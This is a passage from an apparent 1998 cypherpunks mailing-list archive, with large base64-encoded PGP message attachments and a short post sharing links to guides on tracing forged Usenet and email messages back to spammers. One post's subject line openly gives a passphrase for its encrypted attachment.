bUJiWXNQYUcrV3JmL2JMT0t4dENEWDNOUVFVVnRTNEhLVWJiWFcwbTJ3c2xy
bGNUZFZ3ckxuDQpYd1IrN2Z6c2s5Q3pSeGpVTHRScEl3UjR2ejh3OVZETUtM
U2tJcWVCTG5nODl6Y0RxMHNlUzdEWDVxZTFpSlNDDQp4b0wvUXJIa2dLZFhK
ZGlpSDJSZFBMblY3cXdmYlRrM1pKSjkyanRvbXkybzhiUVBxaW9EK3k2SDJS
ZWI3TW4wDQptSnVJeWNQeXFBMGZiWWI4cFNXQThZZVJvdjMwa3pXY1dRVWw4
RGlxNG04OVE4VzhLeHlqS0Y3THFKcXNuVDllDQpYdE1nOTF6OGl0MnVzQ1pN
dGNhWUN2T09FNm9WeStpYlM5b1ZTMmNzUU1GcHBkRzFKaFVJcUMyTVZpSG5G
dVdhDQppRWRRUCtaWEtBZ1hLcmlYMS9KNGpMUHRGUTFBbStpT0M5RUNFSFV2
TmFScjJ2b3Mvczh0SG5kdzNNUGtjc3RTDQo1aHFVQTNNZ2YrWHhIMUt4RHhD
b1FRamg2TDcxa2d6amhvQUlLTXVYRk56R016VlAweExLbEVTQm9pNFgzRVhL
DQpWdU5kc21McXFwcXdxeWlSK0ZkWE9vWnBmQUdaaFJQdEdJaEcxb01TVXJw
Y0VuaW11L1J5blQrRUdLa0R2SzUrDQoveTdVaDZSb3Z4eGRIRzdleWU4RnZP
WUM0MFJBWW1mM2lTYk9UeXJVaktHR0x5ME8vZGwxeFZaWCtQMXdGa3hSDQpm
YTFUME1nNjkycGVMUmpvdGZSdXlsRTJxT0VSdjM2RHhXQkR2RVR5YXR0TWox
WDIzbkNJQlFlS2RuTzZPNFE1DQp6aDZmQXBjNzBJRjFoUmJZRDgrbjMxRkRI
NUQwQVlrcDZFZDlxVzVGQ2xVZXpkVlJoWEp4bEllL0VVajJpY1dqDQp4dTJ1
K0ZnWlJnSkVUTnN1RTVNamFrODVuUHRibmxiTThrQ241SXBNbzljcm1nTHdQ
ek5na3ZnZzRvd0J4aUpCDQpDeTZvNnd5Z1pVTUpxUXViRnNtZWRMUmVTQmtG
NENoWnV1SXZ0R2M0T1gwSjlKYWcvUXRtVGNaT05wRmxiUkZ1DQpaYk9xNUha
cGRpbGpYT2wrWVNVMHk1OEppMmFLaHRTRVRSbXk4eUVGRXo1VTAwc0N2NVFU
YjdpdzJwK2hIWW9LDQprbWx6V05halFvaFZWY0xsZHk3ZmhkZitDc0dKUE9O
ZGFiOHpVZUhYYjR2WjQwNVV6MGhIaHVpV2FaeVJBbkdxDQpraVROREhYYldO
ZUVjVitxWHNxOGJ0MDhZMHRNc29xTTVzQnRmZlhyWmpyUnp4NEQwT2E4R3M4
b3Eza1RIZFcxDQpVV3Z3dnBqMUdGb0sreWIvNks1VXZ2QWM5WDJyL2Fxb1dl
T1Myc2tYcHhJa0tNd1NxbDA5ZERUZTc5SGZwMmViDQpPdW02YXVWM21qNnZL
QnFtQjkvRlFIaDNuWG9kaUM1QXlCMTZGYWlhU0tsYWJ4UFk4NENFMjdnS0JF
ZTJxME94DQpDcDYvaGd3Tk04VTFMTklHWHd2MGNjSnU1azhzbjQvMVRRbW9I
R2pYSUJ3eE9tVm0vc0JtMXZKWDhUNWJONnB3DQpxYkM0RitqRXNOVHptZFpG
WmpiakYzWmFXK1RSbDlIcUZCZndDSEhRY3JyOENhd290ZUVWajd6a3dqQzNv
RWFqDQpwQ1RjbTB2dmJLcmI1aGZVRmRuS1RJdytqWHRORklTeFc2dXpkaExv
dDdRN0g2TGZicmI3c0xoMU1CMDRuazFVDQp5Z3YwWWc5ZnJ4TWx1WjlvK2Iw
aVJrdFIzRmR4eG94TG9ic09aYVNxSG90ditoeTQ5R2kxNmhVSVNOUjlKTzJV
DQpyUGoyUlZvcHcyaDZkNEUzczh5eDJsRGplQ1hkbEllUzJqTkoySks2Zy84
WTFGbVVKY0RqWW5odEZkdVFxK0N6DQp4WXBuUkYwbFY1cXVxUVFRNzdtTnJC
NWVuM1d6NnpqN3U3MkovblpRaUhqakgxZThRTDEvUmhicWZzdzFqZGxaDQpH
akp4cllha2N1V1FuM29HcE4wcFdXZXFJTXZkN2laYWV4bnpabDJnNDVyeGFR
Q1NxdjdSdEdPVmJkTWVnNE1YDQpGU1RaMmtUZ1orUjlTYlI5VWNabTZhOXNM
YUxDelB5NlJ3UGJXY2Z0V2pxcWdhN0JoUkV5YU5iVGhYaGxaNXVuDQpUcWdP
Zkd4NXhrWE9DcnF2Tml5ZjZQZHI0TDlJL2lTWStPb2dOa1grMlhBMU1FNHp5
L3JuUFdEVHVidEJGcUUyDQovUzhmZmM0UjZGd0djVlpqalpNMEdLMVVsdmtj
T0JBOVBmbkltNGsreVBBNXFNWDg2MVVqa2NsWVBGUHNWNzVVDQpZdG9hTFBK
NWxJRmd2NGJKejJ4Q01EaG1QUFJ1MzZLdHE4UDRqakJKOEVEenRGQlQraHhP
ZkF5WDJlK2wzSlI4DQp6QTlYaWx2MlVMamJKOUZ2Z1FUVkQ4MmUyQlN1b1l4
aFdaL3Jtd0poNlM1MHVhVEJkamd4Z2JHZU96N1BOZDdmDQpvVURuMmFhYnVk
SzhpMndpUmErTUdIKzB1OFdxTDBnMWpMRVV1SW9yMUI2MjRTMmJVcWk2eFZ5
Mm1WMm9FbEErDQpwY1RuanlzU0dzK0JKaDczZ2RQVjNjbEo3ODRMZGZXdmNh
ZlZRMkpmS0kvMHA5emZ6dmJmdFJUL1RtZzB4VTdNDQoyWU5KYkZET3loeldM
SVpvYXBKV3B2a1h3NGtGbTg3R1ljQlVTd1VvaUZzWWRGMTRxSkVsek5iSm5x
ekg1aGdnDQpGamxTYWttQVBpd2NFVTU2d0YxVTkweE90aVhqNVVjSHF0OUFM
RWEzTWZsZytJYWZQVW9EQnhhMVBTcDQvK1VSDQpLVDc0OWtyWE81dGlLam9X
cGh1dldDdjJrT0p4dGtWRU1rWm00aGtxQnhxUFZtTEZsbTcySEM4ZTVvYzRo
QVB3DQpZWDJBMytoQ0U3ckF4ZHp0K3lINi8xcWRSNDYrT3lHNkx3ZjhSd05R
cE9vaHFwVllVUVdES3BwZlBIeXZDbnR1DQpic3RLSjJHZkVDc3doRnF3bEJW
NWVDN0hnN2laTElhcHQ4empBQm1kVys0RDhRdkVXS1QvUFg5ejVXS2RxT3pC
DQpzRGM1NGd5K2FFVUlTbUp4a0x5Z2l0N2xIRDVVK0lleDRoYmNFZkpYTVQ4
SllvNi9ESW9jOCsvSzNXR3VER21jDQpNVXROTUdpcHFaSGh1YWkwRVcvU3Fs
aTZTTWlIcDlwYUZ5M2w1MU9FMUg0TmVLbmRGblNvaHR3NlVlaHFJbDhjDQph
SGR3WGpyT0xkTWtsb3puWDJucmFORFBjTnNibXRmSGlVcU1Qd21vTGNoZk1n
NHlZVUVuYTFxTzFqL2FEcG5GDQo3V0F1VEFBcGVIOWdrc1JjRjJCdUZSOVlN
a29ZL2xGcWVPYnlSVFQvNDVnbkpMUGs3MHhQa0VXLzNKVld6bi9yDQpPOVBu
QkJwVGVzc3dxQ0tOdnZqSllmMEJpNVREOTdTTjVzNENQVHF5QXREREF3bG1h
T1FRVkRlMTdqb1B3eG93DQpCM1hqUlQ5bkQ3Wk1iRE1CNHc4ZkhXUjIvaXdP
ZTRMQjFlY0FvdElMU3NMK1lPWTNGa2s3SVpnbzFGdGZFUUJlDQpFMm54T1RE
K1IyZnAyVTkzLzJSTlBFU0tvbVZ6Snl0UWw3em5CeThkTFplVXF4NVZrc3cw
NEUzRzhPblFtVnZkDQpFTjBhUStSbFY4cU5hT2x5cUhRbmVHLzhEMTg4TC85
cUZyNWsyYklQTnFBT1ZwbnpoRno2T0FEbjEwMi9ZZU9VDQo3ekRXb0hZOW1l
RU0rSE9sT2R1Vm92QXNYMTg2QVcrbG03Q0hYU2c2T0J4dk5VZzdEdjlKdVJN
NktpVDlGeGZIDQptLzNCMlVIWmVGQkZrNFFHZVZXK2dPZVR3elZaUk9wOXVj
MXhlMWVma2I4VnZndTMrTUw5MWJsNGo5cElnMHNrDQpjRXlHQ2J2cVhwUS91
QVZnWmRYRnltZkl2dmpqZURRYmU4V1VTaWVZTnl5ZzZ6QXdsTEtveUVhV3VU
NWpmZzVzDQp5Vld1cHRidGwwS08rTWRQc1o4bS91dFM4M1cxdVpOTWNDbnFF
WTVCRGRJY2lsekxvalJGZnFhRkpGYk11YmpTDQpnYTJFQW04MFFzY0xyWkdT
Skx3N0lnc1U0RFh0UzBTM3dmSVVhd0ZzaGZ2Qlc2TWhweVZhLzVrYUZJV3Js
Y1N5DQpaOFhDTkNQeUd3YlYweXJ4dFlJb1V2Sk9rSThEQW5zY1pVUFdCSXly
anNZL295NTUzaXZkUzNlVmZZaUxsN3FZDQpIeUFNek1UYm1LYzdSUFJabFN4
S2piVEZBRndiNklYN25Tb1I0QlhLV1VXemFKY3BMb3dVRzZ5ZTVSL2h6TnJs
DQprbTBMcGw1Y2RsWDRmbmhrMUYyUW9tcWd5NE1sUTdVQmptY04xRTROQ3Ba
VW1Db25jYTZhOC85dHhrUkpUV3RjDQpCRHFqemtDMllqZThRWVc2YmJmK3E4
MlZZeUg4bUtIdDk1SEprVDZYSStNeDZVM0VrSzA0VVFGdS9BM21IK2c1DQpI
dzExMjdjdCtjbHZKbjMxNGVmaCt1MmxEQ08rd2hwZ2RHNkxkd0tIeHM1c2ht
Y1owcEp4UjU2aHRxNEdFTEJRDQo4K1lyTkRQOUZ2RnlXQlRqTGdWcFk5QjJ4
VW96eE82VGFOc0hhbUVRd3Q1Ym1pWUQrQ3M2VmthL3p3ZjZPQlNXDQplOWdu
TkhNelF1SE0yVmljZDdtaUh1WmdLb3pvYjZ6Qmg1ck5YVE5UUkh2ejhQNWpk
QU4vUTcyNk5BWlI4VGVGDQpkeFVmVlpVTHhZSWZYRHJkM1JRZ3RBSUIrQ0RO
TSs1SkxoZ2dsZlRRKzRWcXNGdnU4WUtKdlJ5TS96Unl2a1o1DQpWdVBqbHgr
RXNmK3dLZjlERndMZVk2SlBZd24xOS9aSDZZNkk5dXh2VENWN1Z1YktLRWRR
NEZHWjRNNUtodXdhDQp6ZTdNUlQ0bStBOGRMRXArR3ljMCsyNjgwdXFGaVJG
dWhjSHpHdVBwOGRlMjN0N3dza1EvMWdxS3E2UVpPYytHDQp2MEMrZTM5TkJk
VW5GZFEwQW5HNzF4dXNLdWpCVGJjS0ZqS0w5UWxkRzkwZVFEL09INDdoaFNx
QVBKYWhYOHhYDQp1TEU0OWJia0JieXlxcmcwSm5sU1BiL3JkL1M5ME5IK2Zn
RGRERnB1SGJ1SUhZak5jVmgzRU9pdXRWWWprRllhDQpYcnllR1pjZFJub2k2
VnBzSDZhUkx0WnVicENmRnFmbHhvaWdlc01BeXcwOVJackVvQnRqeS9Celgr
V2RFVHB5DQovWGMvTWNEbjRxTTVYZFZqYVRhcHFVU2E4bmc4YWZFclRPSGY4
NDBIMmdwd2dhaGs4YWs0em95dzRTaTM3MTJUDQpOUXMxbTEreFMxRVJWenVU
SUpWYkZ0MUJIQWZoRko0MVorZWZmY0VESmVvei9SdHZMbThQYm5HQkQyVEkv
empXDQowOEdRNUJJLzFxbEdoQWlHZTJHSjhTcFVKUkFnY1ZGWGNRS01IQzkw
T01CQi9YWnhBZ3VYcHZiVGdXT3VMN0tSDQpIMi9BMFJZbWUrdG9MSkd1YWh3
OU8wYVlvVW5uajdqVU5WV041d05kVVhuVjlzd3Q4YzF3RjNYRlpkcWpiRkx5
DQpjbndaTUlPRXBTam5ERXVDZ0QwU0lPa21Gb2NlR3hnSUY1bkNSL1FxTVUr
YXlUV25SS2dnVWh0WDJoYjNRdkNuDQo4MERvbmVMckJqYy93bzlodkJVTkEz
bXRzTmljTlNPMEdvN29kTHVtd3dES3R6T056WVdaeVVNeW9qY2JYQ0FoDQpz
THkyRGZJNm1wMUZEK3FlN09VK2dna1BCbUp2eGpJQ2R5N1VhRWJLQmFBcHdE
WWswRWJFMEJoTmNrb3dRWlN4DQpRZXBDOVV3Q25nZ2JML05GMTBHeDFwZzJV
bEx1VUcvdGxncWZEaEk3NUFDa2tMWVVwRlpCY1RJZ0M1ZGJYNjBPDQpwTG9M
aDNCTnhmMkJLeTBCNnQ0M3M5djdtQkpLb0xnZ0VicDlXNG14bnViN2hVQmN3
aDdhck1wNlNXNndWOCt1DQpwNEtJcllZZGJEVm45VTZPMThHUzNoWWgwSDht
dGJQaGdkbEZWT1FiTE80SEZGNlF4S3FTZDVUZkdtTjNjc2p3DQpzYUlVZis5
YTU3Y3VsZUROVi8yUEFESUx3VmVrbmtkVUkyK3BBSHNTaVZoeTBiT1dQTXlp
MytyYTE0OHVoamxiDQplNWwrQmFkUjhBZlZsbmRHWnZWSU5UT1lmUEJHenl4
SkpLdVQwU0xOaTRodTFMYnJIc2ZJNmR1bWhkNnNMTkRBDQpOK1ZLL1draTl3
ZktXcytMOXpMQUlWQyt1d25zajM0cnRUbGptUVRqcVRlUU05M0VTcVNyTE9a
RlhSU1NhY2JUDQpNQTJJR0pIY0JZQ1JhSDhyc0NvSzByTVFoV1JUUVl2MUFG
YjRMeHlBclltZkNJZWZJb2VkUlgzTXdLR0pldWZGDQorL2dxU3hYcS9LTDdC
YVYvb2lldWpLb016M0pGWXlNRlBLUTJ3WHBSTWtQTE4vc0hUajlsb3NrVXJw
b1gxR0l3DQplZkVHWWtTNWZhN0NBYVd6ZlhKYVRCQXMxbVk3U1BYN2sxVnVr
UDl4ZkZUdzBFZHFuVktwdzl1bnloTTBWRnIzDQpROE5xN0NLbDBvT3A5T2Yz
NFl4cnZxdWxHMy9iMUdLZHp0dnZXblZLMWlMek1UemNKbHNhVmZhME45Z1g2
cTU0DQppdXRoQVFHV2FiRmRRVjVEdlVmd25EYk1vYzhxNHJNdlVCRGg3WTVY
QWlqRnhlVlU5c0ZtQXVMN05nakIwZVNkDQp1RjN1VE81NlI4Qk80MUZrWVkv
M0J4ODFseVZCWFJNa0MxajNEL1JyMm1RNFFZeTRzVTFORXBkbHBQQ3lyRi9P
DQpmRytTKzh0YXlzV3I1TmIvZXV4cjhYWXp5bFUrYVQrVUJlU1RSKzVzS2ZR
SWJvdmZIUWQ4T1ArVHJlNHdOZzZQDQpyOThtbTN2djYwaDduaGdzR0xoNFA0
SVgyVFp4cE9VckU0T1RiZHh0L0R3TFc2cFFhV0ZPbVc4ZDJsMUJGelNsDQpR
YkZzeTN2TDJKeEN3aXVwMUg1K3N1SXdCUDd5ZEorblMzUGplTkZOR05RdXZC
L3ZjeXFGdmxhWnhTNldGNGR5DQpSTDdTRjRMQXFPaHFxM1drc20wUXJESUVI
N2ZwWDE4M1NXTzhhczdZREVneEhYSE9jTFkyWEJKNStVRUhtQlBhDQpRTVAw
UlFzYnFoRGxsOFpUS0ZXVkZ6Mm0yWDRXeUNJT1pzQVhQbHNndGZYa3VlZ1Qz
ekhvYUJWSzFiK0ZQMzd1DQpVUHdIdG1DNng3d1E5dFl5WjMrQjduLytkenda
ZmxJcFRhTU9qSFhqRDM0TERXUmg1SUZtMDRtWEE2T1pab3VJDQpJYVY3NXV1
YUZsUEZOYURFdUlrZFYyOUYvNTFJSTJJQmhOOGFwa3EyTk0xdnV6RDFWYkl4
dEtETDFXdmNZN0dVDQpCb2phWThFR25ERDdIcUJMOTh5VnRUVUQvNGQ2bStB
Q291NjZUeG1MR1V5U0dDZU05RGQ4MkdUNWk5cVlqQzJGDQpPa2tWL0xBNkhH
Zzg4WTRNK0E2eXlVdU5iUkR3QnZaY3M3b0U2Q2ZDWG5wZjI0VEZkYUswR2Fi
SGhSRWdhMG5jDQpRRHJTcUlZRzJMUndDLzROUFoyYTMxVmhMcXpnQlRhR2ly
LzB4SXQ0UU5zZFFyYlJYbnJRbWprT1cwZzU1ZVNZDQordisrc05SbElnSlFq
S3Q4c0xBcEpoVHFCMHA2RzBBbDZBNmZCMUV4Y3RUVzhqL3ZmZ0dwTktBRVRR
bEN5ZHVMDQpQdmJZWXNYUEtNdCsyOXN5eDE4UXBaQzd4UWVkR3A4cGFyS3ZI
cGhsNzM1Y3FqWVArNk9CZytCRXJxMk5KYTg5DQpRMi8wbGVyZTMvc1lkR3lx
UUVlVkZ6Skh3aVJyaGpUSUZFYmdZQ2xhaGtMRmNqL1hSK3RrbFhPMXhuUmg1
dEdZDQoydHQrTVZjK2ZLcWt2b0dER0tZdi9ob3l4YjBvak5tcVM2dDNrRFkv
OEhxRXJlYTk0eWdHNWFKTlRyZVRKZ2wyDQpIRWlIaTNSV0swNnl2Q3lTYlov
c0tUY0M1bFdCS05PSzdIbGZaNEUzTzlwUGdCMW13ZXdZRENqTFJBODREWXRX
DQpNVVNBZ0pub3FhMVJXSk9qMWxjbWZYTk4zdjV4aUhQNm5DSCtjenE4c0d6
OWtMZ1RuQTMzV05RaGg2K2d4NFd5DQpUTEUvdU1zSWpPSitFNlZLbHlSeGJL
THRGYUwxV0J0dzY4MzEwK2p0aEZEQmdONUVpaGtRN1pqOFQxYUYwdm4wDQov
UmRqc3Q1Ung2cHc1VFd4bGI2dm1YWnBtK2Fwcm8xY0ZZZE0zVlBnM1BsTFVv
UnBRQkV2UkNxVVpMTmJLTmx5DQpnWXRtRHcrbHFlTlVsdS9vNVlSOGU3RDdz
OWtpWTRGeGhmYUxDWUdkV3NSSUhXaVptcjEwWDlQQSswdnVKeWlHDQpUUWRZ
a283Z2hjY3hsRnF4QVRDenRTNlcyNHdlL2ZUanplbUlZanlFdXEzeUg4SlJy
MkF1RWVRdUhTc0dlSTFBDQp0aCthaVFYN1ZtT2xLNGxTd3BXREljSHdRUGxp
QTV4a1A5SU9Pd2ZFaGpDaDIwcVV3REtCOUhCZkwraklVYzkrDQpJVFZnbGEx
Q2lZalNOU3l4d044RkEzVHNad2VOOU1WK0NsS1cya0Vwc3BsUWllQ0plUzBU
T2l5bFdrYVkwVW1xDQpFZUlsT0hrTjJrNWpxT0JxWnFuNXpkUFRoMC9BcUpk
WHhLenVHRDh3MEhxMUs3YkJxK1NpOXAzZXVwbWRiNzQwDQpRcmJsbThLVzM3
alNoZ09vT3VwQW1BZTlDUlZuSGc1ZVV0SlE2NlZXenhmdHhwVVcxdExtK3ZY
ckRmZ3prZk8rDQpjV3JJK2ZvRS91cC9lRW9TUHhucTI3TVp4WDF3MUVXd2tT
a2tjS2ZNQ0VMUmxqTlc2UTdpaFQ3b3l1b0dkSzBNDQo2d251VklPRE5lNHBQ
ejZGRFZvR1gwdzhFYlFtTnpCdWdCcHNjSkh5TENxazZ6SmFqVGx6N0dnNlRM
NVFnU0RxDQpmN0RzdlA1ZHB1dXdYS1JTTzg3MzkwcU05YndkRm1DbnphTHdT
cjU5ZjRsQTg3d1BVVkpJMEhzMEMyYWdzeXMwDQpDaVk4YUFPYzB6TlpPNm04
ZVBER2V1UEw3QlJBdmgrckZVWEF3YVE3VFVUR3A1M1NPK2daTmRoN1hLelFQ
VFkxDQprUXRKUjFuQ1BKbktwcEhZSFA0aWJDOFJ6ZitnRXRBMXBpbjNSc2E4
TEh5TUlNY2lHZTFORUp2eTlsN09VSkxWDQo1VHRvUUEvMzNFL2EzUU5YVEsz
K0xUQll2emtjRFVmVU9ORkk3ckZ0Y0hnR1d5TGEwQy9CRGJqQTJxWjdWaFQ2
DQpDaHZnajBxUTdLUUd2NWxoK0dlR0lVa082RGxkempIUFFrS1pMZjFJQnEz
OWpHSm9udlRXbnR1T3R5MDdtUkJSDQpzWE52MXM1TFdUZTRxVnFuS09mTTdy
SXhFNGFnWkphd0tGSzBEQmNNMTZFYWVuT2VDenpRdGFlc2dUV2hBZUhRDQpv
ZmZHbWx1bVhpNzhaRlQwekNxTEhWWWpzbm5tOFBOT3BmQ1VkMnJ2aUdOa2pj
eUNqSXhaT0dKL1dvVVJiaWRoDQpnTmJ6bEFac1o0elpxNDh0ZkhzNmkvWUxR
aFpZNC84a3o2cXpjSWRMUWxPOC91OUY4clhWS3R5blhrSjRRWDI0DQppOEpO
ZVQvYjJGbTFMdlBwKzRrSkdaa2prUUNxMzYva3dqZmNTS2NVSjRhZkpldHFs
b1pqWXkwbUpia1RNa1E4DQp6MEY0VW1ESFVkdFc1TXpYczVzUnNkKzdJNGZT
U2I2TE1LTFgzQ2JJOVQ1TGlJSkwzOGVKbUZtcnV3PT0NCj1DUW41DQotLS0t
LUVORCBQR1AgTUVTU0FHRS0tLS0tDQo=
--Boundary..3994.1071713793.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 30 Jul 1998 23:55:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Resources on how to track spammers
Message-ID: <199807310655.IAA08821@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


These are two address I thought might be useful.

This is a guide on tracking down real addresses in
usenet faked posts.  Once you find the real addresses or at least have a
couple good guesses on what provider they use reply to their message and
cc: it to the postmaster and technicle contact of all the ISP's you think
it might be.  They can use message ID's and logs to check where the message
originated from.

http://newdata.box.sk/neworder/harmless/GTMHH1-4.TXT


this is the same for forged e-mail.
http://newdata.box.sk/neworder/harmless/GTMHH1-5.TXT

The reason I'm sending this is because of the fact that I almost never get
spam.  When I do I respond quickly and appropriately and the spam dies out.
When I joined and then posted to this list I was flooded with mail.
Personally I this has to be one of the stupided lists to spam.  How many
technical peopl that are interested in crypto are really gaing to respond
to some of these stupid ads







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Fri, 31 Jul 1998 08:06:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pima Community College / PASSWORD: ibrokepgp
Message-ID: <TCPSMTP.18.7.31.8.55.58.2847582152.1142196@fhouse.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3994.1071713793.multipart/mixed"

--Boundary..3994.1071713793.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 
PIMA1.ASC


--Boundary..3994.1071713793.multipart/mixed
Content-Type: application/octet-stream; name="bin00002.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00002.bin"
Content-Description: ""

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tDQpWZXJzaW9uOiAyLjYuMg0K
DQpwZ0FBRWpoc1FMczVUTHVlYThBanNIMjRaWTBnTVV4Z09aa2x4Znc3ZGRw
VU9QSHhLNjNlM0RtME1vTUw1RGlPDQpzc0ZwV2FFZXcvS0MrV0dBQW1Rbk1o
M0cyZGZCNVIvZEJvWWlWeng3d3A0RGk3eW13V1VEUUw3OHJoa0tTWEFyDQpS
ZWFOYVdHNlhzRGZkQkl0bEZyT0JZRnNubjFlcGNwUHRrVm53RGtkRWNrVkNS
SG5Rb2VzY2w2MCtnaVRySlMvDQpaVmtGRXRjNHMyRGlkVjdzaEFZSG1vVi9l
NnkyMHJrMmIzMEo0SjlJemdrVEJ6WFRGTWF4allwTlFxNG5GMDJkDQpYcDVo
R2FlaW5VSGZHSnpEa1NxNGU5aWpodXpaUDdhY2tuOUNXTDUxM2JIMkROU2pW
Ymc5ZGpoODRIVVNsT0pZDQoyVm5QVTFpUHp0RXYrVHI5dGZHejFqWFA2TDJQ
MndSMjFBSmZjWVMyazJ2blNsYXhMdGdIdDAvd2xiVU85RG9NDQo4K3kxOW1F
UnB5RmI5REtDTlp2d2lWN3FyY1Njb2lzZUZUdTVXQ21kSjY1TzUzc2ZxejZI
TUJ2OU9VS2t0T3BzDQpFMlYyWHJseTVHK3NRT3NEUnpQaWkzQng2bU4xbUJh
UEZrOEErbFA2SjhjQlR2ZktXSmZWQVdkcEJwTzZvSlZTDQpDOTNBakkrVlVX
K0dwTlJrcWYveXo5QXFTRy9LWHR1Qlpnc1JwNDBGaHNGZTFYMkNEQkxsMGFI
MG9aa3gzQmErDQpYWVU5UGxON3NXd09WWGhnSkcwV1J2clJReDJDVVMxWVda
YlFGWE5jLzBkZXQwZG5OMjg2R1J1aW1KM0s5NnhBDQpaalcxaE56ektTaGZU
SFVpZGprMFdJRHdyRktYNm5NL0NjcnRGNU9rTExGaHozWDdYbVR0enJxckZZ
ZHZVOTFLDQpFNVF2ak81ajN6QlNMQUJFb0tYemVJT1pycFE3ZjRqZWFnMm9I
allHZkQ0Q2tNOC9YRnAyaFdaQnY2dHhmeHQxDQpKVWJqQTdBeGVKZzV6NVY4
Ky8wUXlKNHlvUWwwQU4zaGV5amh1dUVYZHNJNml0R3RKLzhncTQvY0hlSEhB
c2VYDQpaMnJvQ0pVQzBsQzBia3hLQ2JIelBiZEkvSFJQc3lBZzNhclgxN1l4
T0JCbDFOcWtTclpLdUV1cWRCWmd6ZCtuDQpacGJhZ0ZXeDNYcUNPamoyWlFX
anlBTUtxNGZDV0lzWUYvY0dVVlUycWR3R0U1d3gwVVNXR2JZSjBuUGtEcmhG
DQp2bnVvek9IeGQ0K2tSNUdqdWRuTlBHYmNxMzVBYmJJdXZZdWpDOFJXVGE0
dkN2SGNETU9QbE9iVUhwd3ByMEN4DQpxc29FR2NrRldubUsrVDBhc0lIbk0y
Z2RSTWNhU3Q4Q0JLNDJmTmlHYlRaZzlXMGZOQlIxYXR1Z1FON3FIYzhLDQox
eWhSMGg4WktRMDFQRzk2VFR0WmFpWGEvb0tlUUNhbU1tZXdsS3U3dnN1VVpp
T3BWR1pPQmR6dkpMQUFGSHFCDQpEdEZURUExeUwrVWRkU3RYMDBaRVVTb0Jq
elBjWkpiU0pKUGhaanBRemU1STRBbGVmY0JPWXBlSkNKM2N5OEU0DQo4UjRm
b3JVcXJYTHpNcnVsY3kxUG82T1NUakxuaDFKN1d5UFhhOVpYRm95VHhzM1NX
TGdtaGFrb0JXYk5zQnJMDQpOTm5EZFRFSEFHOUduRjZ4UFdsZ0dFeFJKbmtT
VW1kOWlLVURvU1h1V0ZjTjhMeFgwYzY1MzYvQkwzQ25BUm1uDQpkbG1BMXdp
bW5vRVVQZFd1d1Q5cHJtWi9vWUNvV05wUk5LOFJMTzZkM1hnanBkREtaSGIr
SXRVVWlnRDB2S1d4DQpnSjYyK2FvSmsyNEZjeWNhSEwxZTNSVW9YQUt5ZlZT
UTBuczlXQWU4WDdpSTlLV3ZFYUV0cE1XaUg0bnJtSldZDQpPQjlpeVUxcVdG
cURnbWwxeHhQOElsRHhhVkxIMCtiSXNBRVF4MEtUSVhJMEJjZjA0M1R2cXVL
SGNqdmo5RktkDQpKMFphNnVTTnhrNDJpeE1ZUC9VelpPYW1IRGFXZ3ZBYzNV
bkdSVitCcml2Q2JQK0doNThvdm9YWjJZajN6N08rDQora09qQ1k3ekpzQzYy
WVQzT3Uzemh5UGs5OGRxcDU2cGxXNXhFc3FGY2k5UURoQ3BBbGhFbHQycVVK
SmZPbXRBDQppalBOY08xS1ZoSjNhVUJwdjRZUE11NVFiUHo1Q3dJZElmYUEv
V29HM2djK29zYmx1akJ0aXpiQ2pCZEthUlNuDQpDdFRIY2R2RTZOS1BWTlhs
WUw2MHpzNkNSSE9kQ0lNOXhQWTd3OHNMQmxtWCtEa1VFcFh4ZHN2akNDRG5h
Qy9aDQpmRERGeGx6S2dDSmZFb3lTOEUzTE1EaUpXY1l4Yko4eTFrUW5GSkFE
QUZ0Q3RBenZuendFaGVPY1JPa1paNXBvDQpsVTJZRnp1aW9rNDdrSnFoaWdy
OEdMemplam0yUE9KNDcvN2tLalNtVENoVHMwb1Nsb0YwaUZSN0lUSnJCclRj
DQpmdE1TQ2hYeHIyTjlSVUt5MTdMRTV3VllWc2l2T3NJc1preVF6Ry9CT2RW
WnNmdlJLTHcyOTlXV1pHOVRRM2dpDQplRlhXOE1RcTduUFhFdy9YZC9PSFFP
VWZoTldHTGowWFJKaUV6NEZkVmVydVl4WW5nMEVTV2FsS2Z5djRtbHZMDQoy
Q0lzbWRrZFpTOWJxbzNtS08yelhTc25DR3oxQy9qZTMyRzVZY09uSm1ua1Q1
NDhXZzVZbkNjN2ZBaTZYQ1g1DQp4MERFZFdPaFowZ0tIYnhhSGtDVUxyZWd1
eU5ldVhBMTdHcDlsVHFCMmtvMEI1RkZLandzQUpwYTVaMWZSZEErDQpWQU9p
OCtDMi9vbDBZaUF2YkwvSVBOTCtMb2V1Z29UdXZSM3Vka0xlM2xadmM4WW44
c0lxTVFIbXpyYmNYbW40DQpSczBNa1QrNHBDbXV6MGZGV09SWFkvRGZJZDFq
a0UzNGxmNzV5S0YzbkJKTElNcVJlaHA3TytkUkNTdnV3QjY0DQowaW1jZkpG
RU95dU5WUnBFYnA4MWY1bXZrSlYvRHZxOC9SczRxTUo2ajlpbVFhcWJCYUVD
cHZ5clRvcFRWZEU0DQovN2ZyT3RnemozOTNMckZHNGdBbkU3TWxwU0FCQXdI
YUU0K25jUzQ4cS9BUzhUME95MS91RG1iQ2VPWlg0MTUwDQpTdEN2OHZSK0Z6
elZ1cjdzaEZ1WFhNaFB6REdsTC9pdmhZYnMvdHlCZEk3clg0T3d4cmptb0hK
NmF1Rm95bFJ0DQpMeXU5Y0NaMUxFMVpNSzNNa0Zad0N6NDdyMWlkVFk5emRN
bHVIelhXMHUrc1ZDbmNtRjFuQUxtQ0xOUCsrVCtFDQpMWGdwYzBSdXNLdnZ1
RWRCS3dNdFR1aWZTK3FDSmc3dE1wWThBdXdDTER3VHM1bzdHVHlPZEFSYXRv
Y1lCQmNDDQpoZ2Y3UTYzdjdGaTAxbFBBQmxVZDRzOHJyZmJFaWZxaTNoY3Zz
